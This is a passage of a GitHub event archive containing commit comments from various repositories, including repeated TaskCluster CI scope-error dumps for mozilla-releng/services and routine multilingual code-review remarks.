\\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.950Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.951Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.951Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.115Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"UX7MqrppQgKKZSr_08Aspw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:project/releng/services/master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/project/releng/services/master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"cfa14912f2f079b64808b6fefe18c542ed553135\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:42:59.950Z\",\n                    \"deadline\": \"2016-09-24T11:42:59.951Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T9H_iW7TR6uT5rKXEFcEzw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:42:59.951Z\"\n                },\n                \"time\": \"2016-09-23T11:43:00.115Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:project/releng/services/master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T11:43:00Z"}
{"id":"4608076702","type":"CommitCommentEvent","actor":{"login":"parkey"},"repo":{"name":"parkey/proxy2"},"payload":{"comment":{"id":19144960,"position":null,"line":null,"path":null,"commit_id":"af6730fdc8427b7dda7d1949b9ac727521caa0aa","created_at":"2016-09-23T11:43:02Z","updated_at":"2016-09-23T11:43:02Z","body":"Indenting with tab-characters. Indent width is unfortunately not configurable in github, it seems."}},"created_at":"2016-09-23T11:43:02Z"}
{"id":"4608078739","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19144965,"position":192,"line":192,"path":"UnitHomming.cs","commit_id":"9b79a7a1ad2ec4fee8279346fbbe4c3c2913cfb9","created_at":"2016-09-23T11:43:34Z","updated_at":"2016-09-23T11:43:34Z","body":"for문 안에서 checkTime += Time.deltaTime 하는 이유는 뭔가요?"}},"created_at":"2016-09-23T11:43:34Z"}
{"id":"4608079631","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19144968,"position":192,"line":192,"path":"UnitHomming.cs","commit_id":"9b79a7a1ad2ec4fee8279346fbbe4c3c2913cfb9","created_at":"2016-09-23T11:43:47Z","updated_at":"2016-09-23T11:43:47Z","body":"어쩌다 보니 그렇게 됐습니다."}},"created_at":"2016-09-23T11:43:47Z"}
{"id":"4608079839","type":"CommitCommentEvent","actor":{"login":"abhijit-mahajani-imgtec"},"repo":{"name":"manohar-narkhede-imgtec/openwrt"},"payload":{"comment":{"id":19144969,"position":null,"line":null,"path":null,"commit_id":"ad3a49df1be73b79d270a41549b4d2d9983910b8","created_at":"2016-09-23T11:43:50Z","updated_at":"2016-09-23T11:43:50Z","body":"Approved"}},"created_at":"2016-09-23T11:43:50Z"}
{"id":"4608086864","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19144986,"position":226,"line":226,"path":"UnitHomming.cs","commit_id":"9b79a7a1ad2ec4fee8279346fbbe4c3c2913cfb9","created_at":"2016-09-23T11:45:38Z","updated_at":"2016-09-23T11:45:38Z","body":"`new Vector3( 0, m_TargetPositonHeight, 0 )`는 GC를 유발 하는데 다른 방법을 사용하면 어떨까요?"}},"created_at":"2016-09-23T11:45:38Z"}
{"id":"4608088802","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19144990,"position":226,"line":226,"path":"UnitHomming.cs","commit_id":"9b79a7a1ad2ec4fee8279346fbbe4c3c2913cfb9","created_at":"2016-09-23T11:46:08Z","updated_at":"2016-09-23T11:46:08Z","body":"네~ 멤버로 선언한 후 사용하는 것이 좋겠네요."}},"created_at":"2016-09-23T11:46:08Z"}
{"id":"4608093195","type":"CommitCommentEvent","actor":{"login":"mat-green"},"repo":{"name":"New-Edge-Engineering/ansible-rundeck"},"payload":{"comment":{"id":19145005,"position":8,"line":124,"path":"tasks/main.yml","commit_id":"2520503c3adf1a8700cbf75788ac03d20c8eab2d","created_at":"2016-09-23T11:47:16Z","updated_at":"2016-09-23T11:47:16Z","body":"This should use `rundeck_crowd_jaas_jars` ?"}},"created_at":"2016-09-23T11:47:16Z"}
{"id":"4608094659","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19145009,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T11:47:39Z","updated_at":"2016-09-23T11:47:39Z","body":"下記、『静的プレースホルダを用いる』という形で対策できておりますでしょうか？\r\n[http://ja.stackoverflow.com/questions/5053/php-%E3%81%A7%E3%81%AE-sql-%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E5%AF%BE%E7%AD%96%E3%81%AF%E3%81%A9%E3%81%AE%E3%82%88%E3%81%86%E3%81%AB%E8%A1%8C%E3%81%84%E3%81%BE%E3%81%99%E3%81%8B](url)\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18784699/b22e5366-81ce-11e6-8742-a3081273d262.png)\r\n\r\n静的プレースホルダが何か理解できていませんが、とりあえずこれをsql呼び出しの前に置けばインジェクション対策になるという理解です…"}},"created_at":"2016-09-23T11:47:39Z"}
{"id":"4608095017","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19145010,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T11:47:46Z","updated_at":"2016-09-23T11:47:46Z","body":"I wonder if this works better in the `analysis-development` branch (that I haven't pushed because 100+ unit tests are failing on my computer). I will take a peek and report."}},"created_at":"2016-09-23T11:47:46Z"}
{"id":"4608096554","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19145013,"position":189,"line":189,"path":"UnitHomming.cs","commit_id":"9b79a7a1ad2ec4fee8279346fbbe4c3c2913cfb9","created_at":"2016-09-23T11:48:10Z","updated_at":"2016-09-23T11:48:10Z","body":"`yield return new WaitForEndOfFrame();`는 `yield return Yielders.EndOfFrame;`과 같이 사용하는 것이 GC예방을 위해서 좋다고 생각 합니다."}},"created_at":"2016-09-23T11:48:10Z"}
{"id":"4608096978","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19145015,"position":189,"line":189,"path":"UnitHomming.cs","commit_id":"9b79a7a1ad2ec4fee8279346fbbe4c3c2913cfb9","created_at":"2016-09-23T11:48:17Z","updated_at":"2016-09-23T11:48:17Z","body":"네~"}},"created_at":"2016-09-23T11:48:17Z"}
{"id":"4608102155","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19145024,"position":18,"line":18,"path":"issue11-2/update-edit.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T11:49:41Z","updated_at":"2016-09-23T11:49:41Z","body":"上記ご指摘ありがとうございます！$id, $name-after以外削除しました！"}},"created_at":"2016-09-23T11:49:41Z"}
{"id":"4608102694","type":"CommitCommentEvent","actor":{"login":"jmr0"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":19145029,"position":26,"line":35,"path":"app.py","commit_id":"c493156c445a37ad07c2bb9d2feb425f3ba66591","created_at":"2016-09-23T11:49:49Z","updated_at":"2016-09-23T11:49:49Z","body":"Hmm - how come you don't just pass the added film to the confirmation template when you return addDis or addFilm given that you'd have the information at that point? Or am I missing something here. Adding auto-incrementing primary id's is always recommended anyway, so no worries there. "}},"created_at":"2016-09-23T11:49:49Z"}
{"id":"4608104685","type":"CommitCommentEvent","actor":{"login":"hallaathrad"},"repo":{"name":"marhyorh/FreeCodeCamp"},"payload":{"comment":{"id":19145030,"position":null,"line":null,"path":null,"commit_id":"2a3cdb0ee5449206b6aa208c37bde1ea5b4321b0","created_at":"2016-09-23T11:50:19Z","updated_at":"2016-09-23T11:50:19Z","body":"The issue with the first image is that the menu drops constrained to the right, when it should take the whole screen width under the logo.\r\n\r\n<img width=\"415\" alt=\"screen shot 2016-09-23 at 07 49 06\" src=\"https://cloud.githubusercontent.com/assets/2107110/18784772/58618cb6-8162-11e6-8ee4-3ff3824b5c33.png\">\r\n"}},"created_at":"2016-09-23T11:50:19Z"}
{"id":"4608108098","type":"CommitCommentEvent","actor":{"login":"javiersantos"},"repo":{"name":"javiersantos/MaterialStyledDialogs"},"payload":{"comment":{"id":19145042,"position":null,"line":null,"path":null,"commit_id":"86ed8d3c28e0b3000c9f42ad3c04678c37405814","created_at":"2016-09-23T11:51:11Z","updated_at":"2016-09-23T11:51:11Z","body":"#30 "}},"created_at":"2016-09-23T11:51:11Z"}
{"id":"4608108278","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19145044,"position":21,"line":21,"path":"issue11-2/update-edit.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T11:51:14Z","updated_at":"2016-09-23T11:51:14Z","body":"上記Deleteと同様に対応しました。\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18784803/74e10d86-81cf-11e6-94dd-a6393a83c495.png)\r\n"}},"created_at":"2016-09-23T11:51:14Z"}
{"id":"4608108864","type":"CommitCommentEvent","actor":{"login":"becvert"},"repo":{"name":"becvert/cordova-plugin-zeroconf"},"payload":{"comment":{"id":19145048,"position":null,"line":null,"path":null,"commit_id":"52136071a77cfaec4430bfa531a9d78a362340d3","created_at":"2016-09-23T11:51:23Z","updated_at":"2016-09-23T11:51:23Z","body":"#13 "}},"created_at":"2016-09-23T11:51:23Z"}
{"id":"4608115916","type":"CommitCommentEvent","actor":{"login":"ashfaque15492"},"repo":{"name":"ashfaque15492/tutorials"},"payload":{"comment":{"id":19145072,"position":34,"line":34,"path":"spring-mvc-java/src/test/java/com/baeldung/web/controller/EmployeeTestWithoutMockMvc.java","commit_id":"fdbe1bdfb89fb5b270853a0770031d038a717d8d","created_at":"2016-09-23T11:53:13Z","updated_at":"2016-09-23T11:53:13Z","body":"xcxcxcxc"}},"created_at":"2016-09-23T11:53:13Z"}
{"id":"4608121799","type":"CommitCommentEvent","actor":{"login":"albarin"},"repo":{"name":"javierpedreira/javierpedreira.github.io"},"payload":{"comment":{"id":19145081,"position":5,"line":13,"path":"_posts/2016-09-23-La-narrativa-del-codigo.md","commit_id":"860c47dd08f963ffae11f86a9ceb22131af4fd28","created_at":"2016-09-23T11:54:43Z","updated_at":"2016-09-23T11:54:43Z","body":"- Quitar acentos a los SE que no son del verbo ser\r\n- SanT Jordi"}},"created_at":"2016-09-23T11:54:43Z"}
{"id":"4608122056","type":"CommitCommentEvent","actor":{"login":"satoon101"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19145082,"position":null,"line":null,"path":null,"commit_id":"f4061002ab6088f3b01f98af5ac99526bf73cc4b","created_at":"2016-09-23T11:54:47Z","updated_at":"2016-09-23T11:54:47Z","body":"> Not much time has passed since 464fd06\r\n\r\nI don't understand what you are trying to point out here.\r\n\r\n<br />\r\n> now that there are even more arguments, I would also change *args and **kwargs\r\n\r\nI definitely agree now, in this case, that this would be the correct implementation.  I will work on that sometime today.  Thank you for the suggestion."}},"created_at":"2016-09-23T11:54:47Z"}
{"id":"4608122774","type":"CommitCommentEvent","actor":{"login":"albarin"},"repo":{"name":"javierpedreira/javierpedreira.github.io"},"payload":{"comment":{"id":19145087,"position":10,"line":17,"path":"_posts/2016-09-23-La-narrativa-del-codigo.md","commit_id":"860c47dd08f963ffae11f86a9ceb22131af4fd28","created_at":"2016-09-23T11:54:59Z","updated_at":"2016-09-23T11:54:59Z","body":"SE mal"}},"created_at":"2016-09-23T11:54:59Z"}
{"id":"4608123618","type":"CommitCommentEvent","actor":{"login":"albarin"},"repo":{"name":"javierpedreira/javierpedreira.github.io"},"payload":{"comment":{"id":19145089,"position":68,"line":70,"path":"_posts/2016-09-23-La-narrativa-del-codigo.md","commit_id":"860c47dd08f963ffae11f86a9ceb22131af4fd28","created_at":"2016-09-23T11:55:12Z","updated_at":"2016-09-23T11:55:12Z","body":"SE mal"}},"created_at":"2016-09-23T11:55:12Z"}
{"id":"4608124771","type":"CommitCommentEvent","actor":{"login":"albarin"},"repo":{"name":"javierpedreira/javierpedreira.github.io"},"payload":{"comment":{"id":19145092,"position":91,"line":86,"path":"_posts/2016-09-23-La-narrativa-del-codigo.md","commit_id":"860c47dd08f963ffae11f86a9ceb22131af4fd28","created_at":"2016-09-23T11:55:29Z","updated_at":"2016-09-23T11:55:29Z","body":"Segundo SE mal."}},"created_at":"2016-09-23T11:55:29Z"}
{"id":"4608126436","type":"CommitCommentEvent","actor":{"login":"dsblank"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19145094,"position":null,"line":null,"path":null,"commit_id":"a9f137752938aa067a570f104dbbd8e8a360943b","created_at":"2016-09-23T11:55:54Z","updated_at":"2016-09-23T11:55:54Z","body":"I don't understand why Travis is failing:\r\n\r\nhttps://travis-ci.org/gramps-project/gramps/builds/162156578\r\n\r\nThat doesn't seem to have anything to do with this commit?"}},"created_at":"2016-09-23T11:55:54Z"}
{"id":"4608126749","type":"CommitCommentEvent","actor":{"login":"balachandar-a"},"repo":{"name":"octocat/Spoon-Knife"},"payload":{"comment":{"id":19145095,"position":1,"line":6,"path":"README.md","commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2016-09-23T11:55:58Z","updated_at":"2016-09-23T11:55:58Z","body":"kk\r\n"}},"created_at":"2016-09-23T11:55:58Z"}
{"id":"4608127768","type":"CommitCommentEvent","actor":{"login":"Stane1983"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19145097,"position":null,"line":null,"path":null,"commit_id":"07147c0e24c205b1ff96d72b45148b23ebbc2e60","created_at":"2016-09-23T11:56:14Z","updated_at":"2016-09-23T11:56:14Z","body":"Thats all good but kodi-17.0-beta2-6e9d6fb archive is gone from http://sources.libreelec.tv/devel/"}},"created_at":"2016-09-23T11:56:14Z"}
{"id":"4608135115","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19145118,"position":null,"line":null,"path":null,"commit_id":"c70e3321a3d31f95036588c14dfafc3a0ea581f3","created_at":"2016-09-23T11:58:10Z","updated_at":"2016-09-23T11:58:10Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"RJs38tdfRDKbcFUjwvnJFg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.071Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.071Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.071Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.250Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"RJs38tdfRDKbcFUjwvnJFg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.071Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.071Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.071Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.250Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"RJs38tdfRDKbcFUjwvnJFg\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            